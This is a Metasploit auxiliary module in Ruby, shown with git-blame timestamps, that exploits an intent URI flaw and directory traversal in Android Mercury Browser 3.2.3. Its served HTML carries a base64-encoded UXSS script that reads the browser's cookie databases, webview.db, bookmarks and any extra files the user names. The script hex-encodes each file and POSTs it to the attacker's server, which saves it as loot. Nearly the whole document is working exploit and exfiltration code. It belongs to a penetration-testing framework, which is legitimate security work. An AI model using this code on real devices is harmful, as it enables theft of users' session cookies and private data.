2015-09-16 05:48:57 +00:00
|
|
|
##
|
2017-07-24 13:26:21 +00:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2015-09-16 05:48:57 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Auxiliary
|
2015-09-16 05:48:57 +00:00
|
|
|
include Msf::Exploit::Remote::HttpServer::HTML
|
2015-09-17 14:59:31 +00:00
|
|
|
include Msf::Auxiliary::Report
|
2015-09-16 05:48:57 +00:00
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Android Mercury Browser Intent URI Scheme and Directory Traversal Vulnerability',
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits an unsafe intent URI scheme and directory traversal found in
|
|
|
|
Android Mercury Browser version 3.2.3. The intent allows the attacker to invoke a
|
|
|
|
private wifi manager activity, which starts a web server for Mercury on port 8888.
|
|
|
|
The webserver also suffers a directory traversal that allows remote access to
|
|
|
|
sensitive files.
|
2015-09-17 16:30:58 +00:00
|
|
|
|
|
|
|
By default, this module will go after webviewCookiesChromium.db, webviewCookiesChromiumPrivate.db,
|
|
|
|
webview.db, and bookmarks.db. But if this isn't enough, you can also specify the
|
|
|
|
ADDITIONAL_FILES datastore option to collect more files.
|
2015-09-16 05:48:57 +00:00
|
|
|
},
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'rotlogix', # Vuln discovery, PoC, etc
|
2015-09-17 14:59:31 +00:00
|
|
|
'sinn3r',
|
|
|
|
'joev'
|
2015-09-16 05:48:57 +00:00
|
|
|
],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'References' =>
|
|
|
|
[
|
2015-09-17 14:59:31 +00:00
|
|
|
[ 'URL', 'http://rotlogix.com/2015/08/23/exploiting-the-mercury-browser-for-android/' ],
|
|
|
|
[ 'URL', 'http://versprite.com/og/multiple-vulnerabilities-in-mercury-browser-for-android-version-3-0-0/' ]
|
2015-09-16 05:48:57 +00:00
|
|
|
]
|
|
|
|
))
|
|
|
|
|
2015-09-17 16:30:58 +00:00
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('ADDITIONAL_FILES', [false, 'Additional files to steal from the device'])
|
2017-05-03 20:42:21 +00:00
|
|
|
])
|
2015-09-16 05:48:57 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def is_android?(user_agent)
|
|
|
|
user_agent.include?('Android')
|
|
|
|
end
|
|
|
|
|
|
|
|
def get_html
|
|
|
|
%Q|
|
|
|
|
<html>
|
|
|
|
<head>
|
|
|
|
<meta charset="utf-8" />
|
|
|
|
</head>
|
|
|
|
<body>
|
|
|
|
<script>
|
|
|
|
location.href="intent:#Intent;SEL;component=com.ilegendsoft.mercury/.external.wfm.ui.WFMActivity2;action=android.intent.action.VIEW;end";
|
2015-09-17 14:59:31 +00:00
|
|
|
setTimeout(function() {
|
|
|
|
location.href="intent:#Intent;S.load=javascript:eval(atob('#{Rex::Text.encode_base64(uxss)}'));SEL;component=com.ilegendsoft.mercury/com.ilegendsoft.social.common.SimpleWebViewActivity;end";
|
|
|
|
}, 500);
|
2015-09-16 05:48:57 +00:00
|
|
|
</script>
|
|
|
|
</body>
|
|
|
|
</html>
|
|
|
|
|
|
|
|
|
end
|
|
|
|
|
2015-09-17 14:59:31 +00:00
|
|
|
def backend_url
|
|
|
|
proto = (datastore['SSL'] ? 'https' : 'http')
|
|
|
|
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
|
|
|
|
port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"
|
|
|
|
resource = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
|
|
|
|
|
|
|
|
"#{proto}://#{my_host}#{port_str}#{resource}/catch"
|
|
|
|
end
|
|
|
|
|
|
|
|
def uxss
|
|
|
|
%Q|
|
|
|
|
function exploit() {
|
|
|
|
history.replaceState({},{},'/storage/emulated/0/Download/');
|
|
|
|
var urls = #{JSON.generate(file_urls)};
|
|
|
|
urls.forEach(function(url) {
|
|
|
|
var x = new XMLHttpRequest();
|
|
|
|
x.open('GET', '/dodownload?fname=../../../..'+url);
|
|
|
|
x.responseType = 'arraybuffer';
|
|
|
|
x.send();
|
|
|
|
x.onload = function(){
|
|
|
|
var buff = new Uint8Array(x.response);
|
|
|
|
var hex = Array.prototype.map.call(buff, function(d) {
|
|
|
|
var c = d.toString(16);
|
|
|
|
return (c.length < 2) ? 0+c : c;
|
|
|
|
}).join('');
|
|
|
|
var send = new XMLHttpRequest();
|
|
|
|
send.open('POST', '#{backend_url}/'+encodeURIComponent(url.replace(/.*\\//,'')));
|
|
|
|
send.setRequestHeader('Content-type', 'text/plain');
|
|
|
|
send.send(hex);
|
|
|
|
};
|
|
|
|
});
|
|
|
|
}
|
|
|
|
|
|
|
|
var q = window.open('http://localhost:8888/','x');
|
|
|
|
q.onload = function(){ q.eval('('+exploit.toString()+')()'); };
|
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
def file_urls
|
2015-09-17 16:30:58 +00:00
|
|
|
files = [
|
2015-09-17 14:59:31 +00:00
|
|
|
'/data/data/com.ilegendsoft.mercury/databases/webviewCookiesChromium.db',
|
|
|
|
'/data/data/com.ilegendsoft.mercury/databases/webviewCookiesChromiumPrivate.db',
|
|
|
|
'/data/data/com.ilegendsoft.mercury/databases/webview.db',
|
|
|
|
'/data/data/com.ilegendsoft.mercury/databases/bookmarks.db'
|
|
|
|
]
|
2015-09-17 16:30:58 +00:00
|
|
|
|
|
|
|
if datastore['ADDITIONAL_FILES']
|
|
|
|
files.concat(datastore['ADDITIONAL_FILES'].split)
|
|
|
|
end
|
|
|
|
|
|
|
|
files
|
2015-09-17 14:59:31 +00:00
|
|
|
end
|
|
|
|
|
2015-09-16 16:32:09 +00:00
|
|
|
def on_request_uri(cli, req)
|
2015-09-16 05:48:57 +00:00
|
|
|
print_status("Requesting: #{req.uri}")
|
|
|
|
|
|
|
|
unless is_android?(req.headers['User-Agent'])
|
|
|
|
print_error('Target is not Android')
|
|
|
|
send_not_found(cli)
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
2015-09-17 14:59:31 +00:00
|
|
|
if req.method =~ /post/i
|
|
|
|
if req.body
|
|
|
|
filename = File.basename(req.uri) || 'file'
|
|
|
|
output = store_loot(
|
|
|
|
filename, 'text/plain', cli.peerhost, hex2bin(req.body), filename, 'Android mercury browser file'
|
|
|
|
)
|
|
|
|
print_good("Stored #{req.body.bytes.length} bytes to #{output}")
|
|
|
|
end
|
|
|
|
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
2015-09-16 05:48:57 +00:00
|
|
|
print_status('Sending HTML...')
|
|
|
|
html = get_html
|
|
|
|
send_response_html(cli, html)
|
2015-09-17 14:59:31 +00:00
|
|
|
end
|
2015-09-16 05:48:57 +00:00
|
|
|
|
2015-09-17 14:59:31 +00:00
|
|
|
def hex2bin(hex)
|
|
|
|
hex.chars.each_slice(2).map(&:join).map { |c| c.to_i(16) }.map(&:chr).join
|
2015-09-16 05:48:57 +00:00
|
|
|
end
|
|
|
|
|
2015-09-17 14:59:31 +00:00
|
|
|
|
2015-09-16 05:48:57 +00:00
|
|
|
def run
|
|
|
|
exploit
|
|
|
|
end
|
2015-09-17 16:39:39 +00:00
|
|
|
end
|